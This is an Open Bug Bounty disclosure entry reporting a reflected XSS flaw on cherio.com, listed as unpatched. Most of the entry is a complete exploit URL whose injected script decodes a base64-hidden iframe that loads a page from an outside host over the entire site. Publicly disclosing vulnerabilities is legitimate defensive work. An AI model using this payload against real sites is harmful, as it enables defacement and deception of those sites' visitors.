cherio.com XSS vulnerability

2015-07-08T11:53:00
ID OBB:70529
Type openbugbounty
Reporter sToRm
Modified 2015-07-08T11:55:00

Description

Vulnerable URL:
http://www.cherio.com/backoffice/service/V3/cherio.php/1%22%3E%3C/a%3E%3C/div%3E%3Cscript%3Ealert%28%22XSSPOSED%22%29;document.write%28atob%28%27PGlmcmFtZSBzdHlsZT0icG9zaXRpb246Zml4ZWQ7dG9wOjA7bGVmdDowO3dpZHRoOjEwMCU7bWluLWhlaWdodDoxMDAwcHg7aGVpZ2h0OjEwMCU7Ym9yZGVyOm5vbmU7ei1pbmRleDo5OTkiIHNyYz0iaHR0cDovL3d3dy5zaWNoZXJoZWl0LW9ubGluZS5vcmcveHRlcm5hbC9zdG9ybS5odG1sIj48L2lmcmFtZT4=%27%29%29;%3C/script%3E%3C!--
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 25.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 1
VIP website status:| No
Check cherio.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 8 July, 2015 11:53 GMT
Vulnerability existence verified and confirmed| 8 July, 2015 11:55 GMT